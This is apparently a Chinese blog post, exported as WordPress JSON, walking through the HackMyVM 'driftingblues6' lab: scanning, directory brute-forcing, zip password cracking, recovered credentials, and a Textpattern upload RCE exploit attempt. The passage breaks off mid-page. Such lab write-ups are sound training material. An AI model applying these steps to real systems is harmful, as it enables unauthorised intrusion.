{"id":534,"date":"2024-04-12T14:28:22","date_gmt":"2024-04-12T06:28:22","guid":{"rendered":"http:\/\/162.14.82.114\/?p=534"},"modified":"2024-04-12T14:28:22","modified_gmt":"2024-04-12T06:28:22","slug":"hmv-_-driftingblues6","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/534\/04\/12\/2024\/","title":{"rendered":"hmv[-_-]driftingblues6"},"content":{"rendered":"<h1>driftingblues6<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427819.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427819.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412132416413\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427822.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427822.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412132504356\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.5 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.5:80\n\nPORT   STATE SERVICE REASON  VERSION\n80\/tcp open  http    syn-ack Apache httpd 2.2.22 ((Debian))\n| http-robots.txt: 1 disallowed entry \n|_\/textpattern\/textpattern\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.2.22 (Debian)\n|_http-title: driftingblues<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.5 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.5\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,png,php,zip,git,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 283]\n\/index                (Status: 200) [Size: 750]\n\/db                   (Status: 200) [Size: 53656]\n\/db.png               (Status: 200) [Size: 53656]\n\/robots               (Status: 200) [Size: 110]\n\/robots.txt           (Status: 200) [Size: 110]\n\/spammer              (Status: 200) [Size: 179]\n\/spammer.zip          (Status: 200) [Size: 179]\n\/.php                 (Status: 403) [Size: 283]\n\/server-status        (Status: 403) [Size: 292]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427823.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427823.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412132742826\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427824.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427824.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412132800234\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h3>\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.5\/robots.txt<\/code><\/pre>\n<pre><code class=\"language-text\">User-agent: *\nDisallow: \/textpattern\/textpattern\n\ndont forget to add .zip extension to your dir-brute\n;)<\/code><\/pre>\n<p>\u8fd9\u4e48\u597d\u5fc3\uff01\u53ef\u60dc\u6211\u5df2\u7ecf\u52a0\u4e86\uff0c\u54c8\u54c8\u54c8\u54c8\uff01<\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.5\/textpattern\/textpattern\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427825.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427825.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412133009395\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.5\/db\nhttp:\/\/172.20.10.5\/db.png<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427826.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427826.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412133121984\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.5\/spammer<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427827.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427827.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412133212281\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u7206\u7834zip<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427828.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427828.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412133604245\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">myspace4<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ unzip spammer.zip      \nArchive:  spammer.zip\n[spammer.zip] creds.txt password: \n extracting: creds.txt               \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ cat creds.txt        \nmayer:lionheart<\/code><\/pre>\n<h3>\u5c1d\u8bd5\u5229\u7528\u8d26\u53f7\u5bc6\u7801<\/h3>\n<p>\u5c1d\u8bd5ssh\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ ssh mayer@172.20.10.5                       \nssh: connect to host 172.20.10.5 port 22: Connection refused<\/code><\/pre>\n<p>\u5fd8\u4e86\u6ca1\u5f00\u542f22\u7aef\u53e3\u4e86\uff0c\u53ef\u80fd\u9700\u8981 knock\uff08\u53ea\u662f\u731c\u6d4b\uff09\uff0c\u63a5\u7740\u5f80\u4e0b\u8d70\u5427\uff1a<\/p>\n<p>\u5c06\u4e0a\u9762\u90a3\u4e2a\u6587\u4ef6\u7ed9\u4e0b\u8f7d\u4e00\u4e0b\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u4fe1\u606f\u4ee5\u53ca\u5c1d\u8bd5\u63d0\u53d6\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ wget http:\/\/172.20.10.5\/db.png     \n--2024-04-12 01:43:27--  http:\/\/172.20.10.5\/db.png\nConnecting to 172.20.10.5:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 53656 (52K) [image\/png]\nSaving to: \u2018db.png\u2019\n\ndb.png         100%[=========================================================================&gt;]  52.40K  --.-KB\/s    in 0.001s  \n\n2024-04-12 01:43:27 (60.0 MB\/s) - \u2018db.png\u2019 saved [53656\/53656]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ ls\ncreds.txt  db.png  hash.txt  spammer.zip  spammer.zip.tmp\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ file db.png    \ndb.png: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: &quot;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90&quot;, progressive, precision 8, 458x458, components 3\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ exiftool db.png                                              \nExifTool Version Number         : 12.76\nFile Name                       : db.png\nDirectory                       : .\nFile Size                       : 54 kB\nFile Modification Date\/Time     : 2021:03:15 09:34:46-04:00\nFile Access Date\/Time           : 2024:04:12 01:43:38-04:00\nFile Inode Change Date\/Time     : 2024:04:12 01:43:27-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : None\nX Resolution                    : 1\nY Resolution                    : 1\nComment                         : CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90.\nImage Width                     : 458\nImage Height                    : 458\nEncoding Process                : Progressive DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 458x458\nMegapixels                      : 0.210\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt db.png       \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n[i] Progress: 99.09% (132.2 MB)           \n[!] error: Could not find a valid passphrase.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ strings db.png                                      \nJFIF\n;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90\nS756\nU.uv\naOTh\nxgxg\n........<\/code><\/pre>\n<h3>\u5c1d\u8bd5\u767b\u5f55<\/h3>\n<p>\u4f46\u662f\u6ca1\u6709\u6536\u83b7\u3002\u3002\u3002\u7b49\u4e0b\uff0c\u6211\u4eec\u4e0d\u662f\u6709\u4e2a\u767b\u5f55\u7a97\u53e3\u5417\uff1f\u6211\u662f\u4e2asb\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427829.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427829.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412134633979\" style=\"zoom:33%;\" \/><\/div><\/p>\n<blockquote>\n<p>\u8b66\u544a\u201cmktime()\uff1a\u4f9d\u8d56\u7cfb\u7edf\u7684\u3002\u65f6\u533a\u8bbe\u7f6e\u3002\u60a8\u9700\u8981*\u4f7f\u7528\u65e5\u671f\u3002\u65f6\u533a\u3002\u8bbe\u7f6e\u6216\u65e5\u671f\u9ed8\u8ba4\u65f6\u533aset()\u51fd\u6570\u3002\u5982\u679c\u3002\u4f7f\u7528\u4e86\u8fd9\u4e9b\u65b9\u6cd5\u4e2d\u7684\u4efb\u4f55\u4e00\u79cd\uff0c\u4f46\u60a8\u4ecd\u7136\u4f1a\u6536\u5230\u6b64\u8b66\u544a\uff0c\u60a8\u5f88\u53ef\u80fd\u62fc\u9519\u4e86\u65f6\u533a\u6807\u8bc6\u3002\u6211\u4eec\u9009\u62e9\u4e86\u3002\u76ee\u524d\u4e3a\u65f6\u533a\u2018UTC\u2019\uff0c\u4f46\u8bf7\u5c06Date.timezone\u8bbe\u7f6e\u4e3a\u3002\u9009\u62e9\u60a8\u7684\u65f6\u533a\u3002\u201c<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427830.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427830.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412134800607\" style=\"zoom:50%;\" \/><\/div><\/p>\n<blockquote>\n<p>\u5982\u679c\u4e00\u76f4\u544a\u8b66\u8fdb\u4e0d\u53bb\uff0c\u5c1d\u8bd5\u5207\u6362\u9875\u9762\u518d\u56de\u6765\uff0c\u5c31\u53ef\u4ee5\u8fdb\u53bb\u4e86\u3002<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427831.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427831.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412134914157\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427832.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427832.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412134926786\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u641c\u96c6\u4e00\u4e0bCMS\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427833.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427833.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412135045532\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u7248\u672c\u53f7\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427834.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427834.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412135117818\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6b63\u597d\u6709\u4e00\u4e2aRCE\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ python3 48943.py                      \nSoftware: TextPattern &lt;= 4.8.3\nCVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload\nAuthor: Michele &#039;0blio_&#039; Cisternino\n[*] USAGE: python3 exploit.py http:\/\/target.com username password\n[*] EXAMPLE: python3 exploit.py http:\/\/localhost admin admin\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ python3 48943.py http:\/\/172.20.10.5\/textpattern\/textpattern\/ mayer lionheart\nSoftware: TextPattern &lt;= 4.8.3\nCVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload\nAuthor: Michele &#039;0blio_&#039; Cisternino\n[*] Authenticating to the target as &#039;mayer&#039;\nTraceback (most recent call last):\n  File &quot;\/home\/kali\/temp\/driftingblues6\/48943.py&quot;, line 122, in &lt;module&gt;\n    &quot;_txp_token&quot; : (None, uploadToken), # Token here\n                          ^^^^^^^^^^^\nNameError: name &#039;uploadToken&#039; is not defined<\/code><\/pre>\n<p>\u5c1d\u8bd5\u6587\u4ef6\u4e0a\u4f20\u7684\u5417\uff0c\u6211\u4eec\u76f4\u63a5\u4e0a\u4f20\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427835.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427835.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412140131449\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427836.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427836.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412140212634\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8bbf\u95ee\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.5\/textpattern\/files\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427838.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427838.png\" 